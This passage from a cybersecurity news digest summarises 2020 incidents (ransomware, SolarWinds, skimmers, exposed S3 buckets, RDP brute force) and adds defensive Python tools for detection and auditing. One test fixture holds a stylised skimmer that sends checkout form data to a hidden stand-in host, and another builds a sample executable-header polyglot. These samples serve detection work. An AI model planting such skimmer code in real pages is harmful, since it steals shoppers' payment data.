    Data Breach Today reports: "Whirlpool Hit With Ransomware Attack"
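
The three host-level indicators CERT NZ lists (the .NEFILIM extension, the NEFILIM-DECRYPT.txt note, and batch files dropped in C:\Windows\Temp) are easy to turn into a triage sweep. The following is an added example written for this page, not code from CERT NZ, Emsisoft or Whirlpool; the file listing it checks is constructed, and the suffix match on \Windows\Temp is an assumption made so that the same logic works on a disk image mounted under another root.

```python
import ntpath
import os

# Indicators quoted from the CERT NZ description above.
RANSOM_EXTENSION = ".nefilim"
RANSOM_NOTE = "nefilim-decrypt.txt"
TEMP_DIR_SUFFIX = r"\windows\temp"     # suffix match so a mounted image also works
BATCH_EXTENSIONS = (".bat", ".cmd")

# Constructed file listing standing in for a directory walk of a victim host.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\Q3-forecast.xlsx.NEFILIM",
    r"C:\Users\alice\Desktop\NEFILIM-DECRYPT.txt",
    r"C:\Windows\Temp\a1b2c3.bat",
    r"C:\Windows\Temp\installer.log",
    r"C:\Windows\Temp\sub\other.bat",   # not directly in Temp: not an indicator
    r"C:\Program Files\Vendor\app.exe",
]


def classify_path(path):
    """Return the indicator category a Windows path matches, or None.
    Matching is case-insensitive and tolerates forward slashes."""
    p = path.lower().replace("/", "\\")
    name = ntpath.basename(p)
    if name == RANSOM_NOTE:
        return "ransom_note"
    if name.endswith(RANSOM_EXTENSION):
        return "encrypted_file"
    if ntpath.dirname(p).endswith(TEMP_DIR_SUFFIX) and name.endswith(BATCH_EXTENSIONS):
        return "temp_batch"
    return None


def find_indicators(paths):
    """Group matching paths by category. An empty dict means nothing matched."""
    found = {}
    for path in paths:
        category = classify_path(path)
        if category:
            found.setdefault(category, []).append(path)
    return found


def scan_tree(root):
    """Apply the same classification to a live tree, e.g. a mounted disk
    image. Paths are reported as os.walk produces them."""
    def walk():
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                yield os.path.join(dirpath, name)
    return find_indicators(walk())


if __name__ == "__main__":
    for category, paths in find_indicators(SAMPLE_LISTING).items():
        print(category)
        for p in paths:
            print("   ", p)
```

A single hit on the ransom note or the extension is enough to escalate; the batch-file check is weaker on its own (installers also drop .bat files there), which is why the function reports categories separately rather than a combined score.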

  • news

    Visible to the public "Worldwide VPN Market to Reach $75.59 Billion by 2027"

    Researchers have found that the global VPN market was valued at $25.41 billion in 2019 and is projected to reach $75.59 billion by 2027, growing at a compound annual growth rate of 14.7% from 2020 to 2027. The major factors driving the VPN market's growth include the increase in data security concerns, the rise in advanced and complex cyber threats, and the growing use of mobile and wireless devices within organizations. North America is expected to hold the largest VPN market share in 2027, followed by the European market. The Asia Pacific market is projected to register the highest compound annual growth rate over the forecast period.

    Help Net Security reports: "Worldwide VPN Market to Reach $75.59 Billion by 2027"

  • news

    Visible to the public "Data Breach Broker Selling User Records Stolen From 26 Companies"

    BleepingComputer has discovered that a data breach broker is selling more than 360 million user records allegedly stolen from 26 companies on a hacker forum. Threat actors and hacking groups commonly work with data breach brokers to market and sell the data they steal from companies' user databases. Of the 26 affected companies, eight are alleged breaches that had not been disclosed previously: Teespring, SitePoint, Wahoo Fitness, Chqbook, AnyVan, Eventials, ClickIndia, and myON. This article continues to discuss the discovery of the stolen user records being sold by a data breach broker on a hacker forum, responses from the impacted companies, and what potentially affected users should do to protect themselves.

    BleepingComputer reports "Data Breach Broker Selling User Records Stolen From 26 Companies"

  • news

    Visible to the public "New Golang Worm Turns Windows and Linux Servers Into Monero Miners"

    Researchers from Intezer released details about a new Golang-based worm that drops the XMRig cryptocurrency miner on Windows and Linux servers. According to the researchers, the worm targets MySQL, Jenkins, Tomcat, WebLogic, and other public-facing services that use weak passwords. The attackers behind the campaign have been actively updating the worm on its command-and-control (C2) server, indicating that it is under continued maintenance, and future updates are expected to target more weakly configured services. Security teams are advised to use stronger passwords, limit login attempts, and enable two-factor authentication. Intezer researchers also urge security teams to minimize the use of public-facing services, keep software up to date, and use a cloud workload protection platform. This article continues to discuss the spread, capabilities, potential large-scale impact, and prevention of the new Golang worm.

    SC Media reports "New Golang Worm Turns Windows and Linux Servers Into Monero Miners"

  • news

    Visible to the public "DDoS Attacks Spiked, Became More Complex in 2020"

    There has been a significant increase in Distributed Denial-of-Service (DDoS) attacks as a result of the large-scale shift to remote work among organizations and the increased use of online services during the COVID-19 pandemic. DDoS mitigation service providers have reported an increase in attack volumes, sophistication, and complexity in 2020. Trends surrounding DDoS in 2020 observed by security experts include the surge in DDoS attacks stemming from the global pandemic, the increase in the number of extortion DDoS attacks, the growth in multivector attacks, the increase in the size of DDoS attacks, and the broadening of attackers' range of targets. This article continues to discuss major DDoS trends seen by security experts in 2020 regarding the increase in number, size, and complexity of DDoS attacks.

    Dark Reading reports "DDoS Attacks Spiked, Became More Complex in 2020"

  • news

    Visible to the public "Hackers Threaten to Leak Plastic Surgery Pictures"

    The ransomware gang known as REvil has stolen data from the Transform Hospital Group, which is the UK's leading specialist weight loss and cosmetic surgery group. REvil claims to be in possession of patients' before and after photos. The group also claims to have obtained more than 900 gigabytes of these patient photographs. They are threatening to publish the photos. A statement released by the Transform Hospital Group confirms that no payment card details belonging to patients were compromised in the breach of its IT systems. However, some personal data, in addition to the photographs, may have been accessed by the hackers. Travelex and the entertainment law firm Grubman Shire Meiselas & Sacks have also fallen victim to REvil, also known as Sodinokibi. This article continues to discuss the ransomware attack faced by the Transform Hospital Group, the group's threats to publish patients' photographs, and recent changes in tactics used by ransomware gangs to pressure victims into paying the demanded ransoms.

    BBC reports "Hackers Threaten to Leak Plastic Surgery Pictures"

  • news

    Visible to the public "NIST Shares Best Practice Security Guidance for Vulnerable PACS"

    The National Institute of Standards and Technology (NIST) has released cybersecurity guidance for Picture Archiving and Communication Systems (PACS), which manage medical images. A PACS accepts, transfers, displays, stores, and digitally processes medical images, and PACS servers are widely used in healthcare delivery organizations. However, reports have revealed that vulnerabilities in PACS have led to the exposure of millions of medical images. One concern is the DICOM protocol and file format that PACS rely on, which has flaws that could allow attackers to hide malware inside medical images and so tamper with patient data. NIST Special Publication (SP) 1800-24 addresses these risks and provides guidance to help healthcare delivery organizations strengthen the security of their PACS and DICOM deployments and prevent patient data exposure. The guide was built on a risk assessment of PACS against NIST standards. NIST's National Cybersecurity Center of Excellence (NCCoE) also developed an example implementation that demonstrates how healthcare entities can use standards-based, commercially available technologies to bolster the security of the PACS ecosystem. This article continues to discuss the cybersecurity guidance released by NIST for PACS, the flaws in this technology, and the challenges of securing PACS.

    HealthITSecurity reports "NIST Shares Best Practice Security Guidance for Vulnerable PACS"
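
The "malware hidden in medical images" concern above rests on the layout of a DICOM Part 10 file: a 128-byte preamble whose content the standard leaves open, followed by the four-byte "DICM" prefix. Because PACS and viewers ignore the preamble, an executable header placed there makes a single file that is both a valid image and a valid program (a polyglot). The following is an added example for this page, not code from NIST, the NCCoE or SP 1800-24: an ingest check that flags such preambles and a neutralizer that zeroes them. The sample files are constructed; the stub body after "DICM" is only a group-length element and is not parsed.

```python
import sys

PREAMBLE_LEN = 128                 # DICOM Part 10: 128-byte preamble ...
MAGIC = b"DICM"                    # ... followed by the 4-byte "DICM" prefix
KNOWN_EXEC_MAGIC = (
    (b"MZ", "pe"),                 # Windows PE/DOS executable header
    (b"\x7fELF", "elf"),           # Linux ELF executable
    (b"#!", "script"),             # interpreter shebang
)


def inspect_dicom(data):
    """Return (verdict, detail) for a byte string that should be a DICOM file."""
    if len(data) < PREAMBLE_LEN + len(MAGIC) or data[PREAMBLE_LEN:PREAMBLE_LEN + 4] != MAGIC:
        return ("not-dicom", "no DICM prefix at offset 128")
    preamble = data[:PREAMBLE_LEN]
    for magic, kind in KNOWN_EXEC_MAGIC:
        if preamble.startswith(magic):
            return ("polyglot", kind)
    if any(preamble):
        # Legitimate but uncommon: some writers put a TIFF or other header here.
        return ("nonzero-preamble", preamble[:8].hex())
    return ("clean", "")


def zero_preamble(data):
    """Return a copy with the preamble zeroed; the DICOM content after offset
    128 is untouched. Run on ingest so a polyglot cannot survive into PACS."""
    if inspect_dicom(data)[0] == "not-dicom":
        raise ValueError("not a DICOM Part 10 file")
    return b"\x00" * PREAMBLE_LEN + data[PREAMBLE_LEN:]


def make_sample(preamble):
    """Constructed DICOM-shaped bytes: the given preamble (zero-padded to 128),
    the DICM prefix, and a (0002,0000) group-length element as a stub body."""
    if len(preamble) > PREAMBLE_LEN:
        raise ValueError("preamble too long")
    body = b"\x02\x00\x00\x00UL\x04\x00\xc0\x00\x00\x00"
    return preamble.ljust(PREAMBLE_LEN, b"\x00") + MAGIC + body


CLEAN_IMAGE = make_sample(b"")
PE_POLYGLOT = make_sample(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff")


if __name__ == "__main__":
    # Usage: python dicom_preamble.py file.dcm ...; with no arguments the two
    # constructed samples are inspected.
    if len(sys.argv) > 1:
        samples = [(p, open(p, "rb").read()) for p in sys.argv[1:]]
    else:
        samples = [("clean", CLEAN_IMAGE), ("pe-polyglot", PE_POLYGLOT)]
    for name, data in samples:
        print(name, *inspect_dicom(data))
```

Zeroing the preamble is safe for PACS use because the standard assigns it no DICOM meaning; a non-zero but non-executable preamble is reported rather than rejected, since some legitimate writers do use it, and the decision to strip it belongs in ingest policy.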

  • news

    Visible to the public "6 Questions Attackers Ask Before Choosing an Asset to Exploit"

    David "moose" Wolpoff, co-founder and CTO at Randori, argues that understanding how attackers reason is important: applying attacker logic inside an enterprise shifts its security strategy, leading to greater efficiency and lower risk. From an attacker's perspective, deciding which assets on an attack surface to go after and exploit begins with six questions: What useful information can I see about a target from the outside? How valuable is this asset to the adversary? Is the asset known to be exploitable? How hospitable will this asset be if I pwn it? How long will it take to develop an exploit? Is there repeatable ROI in developing an exploit? The article continues to answer these six questions in detail and stresses the importance of security teams thinking more like an attacker.

    Threatpost reports: "6 Questions Attackers Ask Before Choosing an Asset to Exploit"

  • news

    Visible to the public "FBI: Home Surveillance Devices Hacked to Record Swatting Attacks"

    The FBI issued an alert on Tuesday warning that swatters have been hijacking home surveillance and other devices with audio and video capabilities to watch their victims while they are being swatted. In some cases, the perpetrator also live-streams the video and engages with the responding law enforcement officers. Swatting is a hoax in which someone tricks emergency services into deploying armed law enforcement to a targeted individual's location by claiming there is a life-threatening situation. Smart home device manufacturers recently notified law enforcement that offenders have been using stolen email passwords, reused on the device accounts, to log in to smart devices with cameras and voice capabilities and carry out the swatting attacks. The FBI has been working with the manufacturers of the targeted devices to warn customers about the threat and provide recommendations on how to keep their devices from being hijacked.

    SecurityWeek reports: "FBI: Home Surveillance Devices Hacked to Record Swatting Attacks"

  • news

    Visible to the public "Fresh Card Skimmer Attacks Multiple E-Commerce Platforms"

    Researchers with the Dutch security firm Sansec recently discovered a payment card skimmer targeting multiple content management systems that power many e-commerce sites' online checkout pages. According to a report released by the researchers, the new skimmer was found on a dozen online stores' checkout pages running on Shopify, BigCommerce, Zen Cart, and WooCommerce. It remains unclear whether this card-skimming malware is tied to a specific Magecart group. Magecart refers to several separate hacking groups that steal credit card numbers and other sensitive data through web-based card-skimming attacks. The report highlights that the skimmer is unusual because it can target multiple content management systems simultaneously instead of individually. This article continues to discuss current findings on how the new payment card skimmer works, as well as other new techniques fraudsters have been using to hide malicious JavaScript skimmers within e-commerce checkout sites.

    GovInfoSecurity reports "Fresh Card Skimmer Attacks Multiple E-Commerce Platforms"
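
Whatever platform the skimmer lands on, it ends up as script content in the checkout page, so one platform-independent control is to baseline the page's scripts and diff each fetch against that baseline. The following is an added example for this page, not code from Sansec or from the report, and not a reconstruction of the skimmer it describes: it inventories external script origins and inline script hashes with the standard library and reports anything outside the allowlist, flagging common obfuscation markers on unknown inline code. The page, hostnames (.example) and the stylised injected script are all constructed.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Strings that skimmers commonly use to hide exfiltration endpoints.
OBFUSCATION_MARKERS = ("atob(", "fromCharCode", "unescape(", "eval(")


def sha256_hex(text):
    return hashlib.sha256(text.strip().encode("utf-8")).hexdigest()


def audit_checkout_page(html, allowed_origins, known_inline_hashes):
    """Compare a fetched checkout page against a baseline: every external
    script must come from an allowed origin and every inline script must
    hash to a known value. Anything else is returned as a finding."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        origin = urlsplit(src).netloc.lower()
        if origin and origin not in allowed_origins:
            findings.append(("unknown-origin", src))
    for code in collector.inline:
        digest = sha256_hex(code)
        if digest not in known_inline_hashes:
            markers = [m for m in OBFUSCATION_MARKERS if m in code]
            findings.append(("unknown-inline", digest[:12], markers))
    return findings


# Constructed baseline and page. Hostnames use .example; the injected script
# is a stylised stand-in for a skimmer, not code recovered from any real site.
BASELINE_INLINE = "window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'checkout'});"
INJECTED_INLINE = (
    "document.querySelector('form').addEventListener('submit', function (e) {"
    " var d = new FormData(e.target), s = '';"
    " d.forEach(function (v, k) { s += k + '=' + v + '&'; });"
    " new Image().src = atob('aHR0cHM6Ly9leGZpbC5leGFtcGxlLw==')"
    " + String.fromCharCode(63) + encodeURIComponent(s); });"
)
SAMPLE_PAGE = (
    '<html><head>'
    '<script src="https://cdn.shop.example/js/checkout.min.js"></script>'
    '<script src="https://pay.psp.example/v1/client.js"></script>'
    '<script>' + BASELINE_INLINE + '</script>'
    '<script src="https://static.cdn-cache.example/jquery.min.js"></script>'
    '</head><body><form id="checkout"></form>'
    '<script>' + INJECTED_INLINE + '</script>'
    '</body></html>'
)
ALLOWED_ORIGINS = {"cdn.shop.example", "pay.psp.example"}
KNOWN_INLINE = {sha256_hex(BASELINE_INLINE)}


if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_PAGE, ALLOWED_ORIGINS, KNOWN_INLINE):
        print(*finding)
```

In production the same allowlist should be enforced in the browser with a Content Security Policy (script-src limited to the allowed origins plus hashes of the known inline scripts); the audit above then acts as a check that the served page still matches the policy, and catches changes on a hosted platform where you cannot set headers yourself.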

  • news

    Visible to the public "Finnish Lawmakers' Emails Hacked in Suspected Espionage Incident"

    Email accounts belonging to Finnish lawmakers were accessed by hackers during a cyberattack on the Finnish Parliament's IT system. According to a statement by Tero Muurman, an inspector at the National Bureau of Investigation, the actors behind the suspected espionage operation may have obtained information either to benefit a foreign state or to harm Finland. The exact number of lawmakers affected remains unclear, but multiple people are believed to have been targeted in the incident. The Speaker of Finland's Parliament stressed that the incident is an attack on Finland's democracy. This article continues to discuss the cyberattack on the Finnish Parliament and other incidents in which nation-state hackers have targeted national legislatures.

    CyberScoop reports "Finnish Lawmakers' Emails Hacked in Suspected Espionage Incident"

  • news

    Visible to the public "Misconfigured AWS Bucket Exposes Hundreds of Social Influencers"

    Researchers at vpnMentor have discovered that a misconfigured cloud storage bucket exposed hundreds of social media influencers' personal details, potentially putting them at risk of fraud and harassment. The misconfigured AWS S3 bucket was found in early November and was wide open, with no encryption or password protection. The researchers notified the Barcelona-based company 21 Buttons about the bucket in November, but the company has not yet fixed the issue. The bucket contains 50 million files, mainly influencer photos and videos. The research team also discovered hundreds of invoices for payments made to the influencers. The personally identifiable information (PII) exposed includes full names, postal codes, bank details, national ID numbers, and PayPal email addresses.

    Infosecurity reports: "Misconfigured AWS Bucket Exposes Hundreds of Social Influencers"
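
"Wide open with no encryption or password protection" almost always means one of three things on S3: a bucket policy that grants access to Principal "*", an ACL grant to the AllUsers or AuthenticatedUsers group, or Block Public Access left off so that either of those takes effect. The following is an added example for this page, not code from vpnMentor or 21 Buttons, that audits those three settings from their JSON/dict representations and shows the weak configuration next to a hardened one. The inputs are constructed in the shape that boto3's get_bucket_policy (after json.loads), get_bucket_acl()["Grants"] and get_public_access_block()["PublicAccessBlockConfiguration"] return; bucket names, the account ID and the role are made up.

```python
import json

# Keys of an S3 PublicAccessBlock configuration; all four must be True.
PAB_KEYS = ("BlockPublicAcls", "IgnorePublicAcls",
            "BlockPublicPolicy", "RestrictPublicBuckets")

PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principals(principal):
    """Flatten the Principal element ("*", {"AWS": [...]}, ...) to a list."""
    if isinstance(principal, dict):
        out = []
        for v in principal.values():
            out.extend(_as_list(v))
        return out
    return _as_list(principal)


def public_policy_statements(policy):
    """Flag Allow statements granted to everyone. Statements restricted by a
    Condition are reported separately since they need human review."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" not in _principals(stmt.get("Principal", {})):
            continue
        actions = ", ".join(_as_list(stmt.get("Action", [])))
        sid = stmt.get("Sid", f"#{i}")
        if stmt.get("Condition"):
            findings.append(f"statement {sid} allows {actions} to everyone, limited by a Condition: review")
        else:
            findings.append(f"statement {sid} allows {actions} to everyone")
    return findings


def public_acl_grants(grants):
    """Flag ACL grants to the AllUsers / AuthenticatedUsers groups."""
    findings = []
    for g in grants:
        uri = g.get("Grantee", {}).get("URI")
        if uri in PUBLIC_ACL_GROUPS:
            findings.append(f"ACL grants {g.get('Permission')} to {PUBLIC_ACL_GROUPS[uri]}")
    return findings


def audit_bucket(policy, acl_grants, public_access_block):
    """Combine the three checks; an empty list means no public exposure found."""
    findings = []
    missing = [k for k in PAB_KEYS if not public_access_block.get(k, False)]
    if missing:
        findings.append("Block Public Access not fully enabled: " + ", ".join(missing))
    findings += public_policy_statements(policy)
    findings += public_acl_grants(acl_grants)
    return findings


# Constructed inputs; bucket name, account ID and role are made up.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                 "Action": "s3:GetObject",
                 "Resource": "arn:aws:s3:::influencer-media-example/*"}]
}""")
WEAK_ACL = [{"Grantee": {"Type": "Group",
                         "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
             "Permission": "READ"}]
WEAK_PAB = {k: False for k in PAB_KEYS}

HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "AppRoleRead", "Effect": "Allow",
                 "Principal": {"AWS": "arn:aws:iam::123456789012:role/media-app"},
                 "Action": ["s3:GetObject"],
                 "Resource": "arn:aws:s3:::influencer-media-example/*"}]
}""")
HARDENED_ACL = [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"},
                 "Permission": "FULL_CONTROL"}]
HARDENED_PAB = {k: True for k in PAB_KEYS}


if __name__ == "__main__":
    for label, args in (("weak", (WEAK_POLICY, WEAK_ACL, WEAK_PAB)),
                        ("hardened", (HARDENED_POLICY, HARDENED_ACL, HARDENED_PAB))):
        print(label, audit_bucket(*args) or ["no public exposure found"])
```

The hardened configuration keeps the bucket private and lets the application reach the media through a named role; public delivery, if needed, belongs behind a CDN origin access identity or presigned URLs rather than an open bucket. Encryption at rest does not enter this audit because it would not have helped here: an open bucket serves decrypted objects to anyone.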

  • news

    Visible to the public "Critical Flaws in Kepware Products Can Facilitate Attacks on Industrial Firms"

    The U.S. Homeland Security Department's Cybersecurity & Infrastructure Security Agency (CISA) recently published advisories about vulnerabilities in Kepware products discovered by researchers at the industrial cybersecurity firm Claroty. One of the advisories covers three of the flaws, two rated critical and one high in severity. The vulnerabilities are described as a stack-based buffer overflow, a heap-based buffer overflow, and a use-after-free bug. Exploiting the critical vulnerabilities could lead to server crashes, data leakage, remote code execution, and a Denial-of-Service (DoS) condition. An attacker could abuse the high-severity bug to crash the server by opening and closing OPC UA connections at a high rate. According to Uri Katz, a senior researcher at Claroty, the vulnerabilities were found in the KEPServerEX, ThingWorx, and OPC-Aggregator OPC products. Attackers need network access to the OPC server to exploit these flaws, and research has shown that they can be exploited remotely without authentication. This article continues to discuss the discovery, exploitation, and potential impact of the critical flaws in Kepware products.

    Security Week reports "Critical Flaws in Kepware Products Can Facilitate Attacks on Industrial Firms"

  • news

    Visible to the public "Remote Desktop Bugs: Patches That Took Priority in a Pandemic Year"

    Microsoft released patches for a record number of Common Vulnerabilities and Exposures (CVEs) in 2020, many of which affected the Microsoft Remote Desktop Protocol (RDP). The Remote Desktop service proved essential during the COVID-19 pandemic as many organizations transitioned to remote work. According to Satnam Narang, a research engineer at Tenable, Microsoft patched a total of 1,245 bugs this year, significantly exceeding the 840 bugs fixed in 2019 and the combined total of bugs patched in 2017 and 2018. The increased use of the Remote Desktop Client, Remote Desktop Services, and Remote Desktop Gateway during the pandemic has made them more appealing targets for attackers. Brute force is the most common type of attack against RDP: criminals try different username and password combinations for an RDP connection until one is accepted. The use of this attack method surged in early March, and the total number of such attacks reached 3.3 billion within the first 11 months of 2020. This article continues to discuss Microsoft's prioritization of Remote Desktop flaws this year, the increased targeting of protocols by attackers, brute force attacks against RDP, and the growth in security research surrounding RDP.

    Dark Reading reports "Remote Desktop Bugs: Patches That Took Priority in a Pandemic Year"
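
Both the Golang worm item above (weak passwords on MySQL, Jenkins, Tomcat and WebLogic, with "limit login attempts" as the advice) and this RDP item come down to the same detection: many failed logons from one source against one service in a short window, and especially a success that follows them. The following is an added example for this page, not code from Intezer, Tenable, Microsoft or either article: a sliding-window brute-force detector run over constructed, already-normalized log lines. The line format is an assumption; in practice each source (Windows event 4625 for RDP, MySQL "Access denied" errors, application server access logs) has to be mapped into a shape like this first.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, normalized auth log. Real sources differ (Windows event 4625
# for RDP, MySQL's "Access denied" errors, Jenkins/Tomcat access logs), so the
# first step in practice is mapping each source into this shape.
SAMPLE_LOG = """\
2020-03-02T10:00:01Z service=rdp src=203.0.113.5 user=administrator result=fail
2020-03-02T10:00:04Z service=rdp src=203.0.113.5 user=admin result=fail
2020-03-02T10:00:07Z service=mysql src=203.0.113.5 user=root result=fail
2020-03-02T10:00:09Z service=rdp src=203.0.113.5 user=backup result=fail
2020-03-02T10:00:12Z service=rdp src=198.51.100.7 user=jsmith result=fail
2020-03-02T10:00:15Z service=rdp src=203.0.113.5 user=svc_backup result=fail
2020-03-02T10:00:21Z service=rdp src=203.0.113.5 user=svc_backup result=fail
2020-03-02T10:00:30Z service=rdp src=203.0.113.5 user=svc_backup result=success
2020-03-02T10:06:00Z service=rdp src=198.51.100.7 user=jsmith result=fail
2020-03-02T10:12:00Z service=rdp src=198.51.100.7 user=jsmith result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+service=(?P<service>\S+)\s+src=(?P<src>\S+)\s+"
    r"user=(?P<user>\S+)\s+result=(?P<result>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Raise one alert per (source, service) the first time it accumulates
    `threshold` failures inside a sliding window of `window_seconds`, and
    record the account if a later success from the same source follows (a
    guessed password rather than mere noise)."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # (src, service) -> recent failure times
    alerts = {}                     # (src, service) -> alert dict
    for event in filter(None, map(parse_line, lines)):
        key = (event["src"], event["service"])
        if event["result"] == "fail":
            recent = failures[key]
            recent.append(event["ts"])
            while recent and event["ts"] - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {
                    "src": event["src"], "service": event["service"],
                    "failures": len(recent), "first": recent[0],
                    "last": event["ts"], "success_after": None,
                }
        elif event["result"] == "success" and key in alerts:
            if alerts[key]["success_after"] is None:
                alerts[key]["success_after"] = event["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['service']} brute force from {a['src']}: {a['failures']} failures "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; "
              f"success_after={a['success_after']}")
```

In the sample, 203.0.113.5 crosses the threshold against RDP at 10:00:21 and then logs in as svc_backup nine seconds later, which is the case to page on; 198.51.100.7 fails twice over six minutes and is ignored. The same threshold and window are what a lockout or rate-limiting rule would enforce, so tuning the detector and tuning the control are the same exercise.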

  • news

    Visible to the public "SolarWinds Hackers 'Impacting' State and Local Governments"

    The U.S. Homeland Security Department's Cybersecurity & Infrastructure Security Agency (CISA) issued a warning about the significant impact of the recent SolarWinds Orion software supply chain hacking attack. The attack on SolarWinds' Orion IT management platform affected several U.S. government agencies, including the departments of Treasury, Commerce, and Homeland Security. This attack also compromised critical infrastructure and organizations in the private domain. CISA urges all federal civilian agencies to review their networks for signs of compromise as well as disconnect SolarWinds Orion products. The agency has emphasized the significance of this cyber incident as it has impacted the U.S. federal, state, and local governments, in addition to critical infrastructure entities and private organizations. According to CISA, the Advanced Persistent Threat (APT) actor behind the SolarWinds supply chain attack is well-resourced and has extensively abused commonly used authentication mechanisms. The agency calls on organizations to prioritize the identification and elimination of this threat as it could lead to the exposure of highly sensitive information. CISA is working with the Federal Bureau of Investigation (FBI) and the Office of the Director of National Intelligence (ODNI) to form a Cyber Unified Coordination Group (UCG), which will establish a coordinated whole-of-government approach to addressing the SolarWinds attack. This article continues to discuss the impact and severity of the SolarWinds attack, as well as CISA's recommendations to organizations on addressing this threat and other efforts by the agency to respond to the attack.

    Infosecurity Magazine reports "SolarWinds Hackers 'Impacting' State and Local Governments"

  • news

    Visible to the public "NIST Releases Draft Guidance for IoT Cybersecurity"

    The National Institute of Standards and Technology (NIST) has released a draft version of Special Publication (SP) 800-213 and a number of supporting documents developed to provide cybersecurity guidance to manufacturers of Internet of Things (IoT) devices. The draft of SP 800-213 highlights concerns that Federal agencies must consider when acquiring IoT devices, building on NIST's Cybersecurity Framework and Risk Management Framework. The guide includes ten specific questions that agencies should ask when establishing requirements, covering aspects such as how an IoT device interacts with the broader network. The document also recommends what agencies should look for in the security capabilities an IoT device needs to provide before it is integrated into Federal information systems. This article continues to discuss the goal and contents of the draft SP 800-213 and the other draft documents on IoT security released by NIST.

    MeriTalk reports "NIST Releases Draft Guidance for IoT Cybersecurity"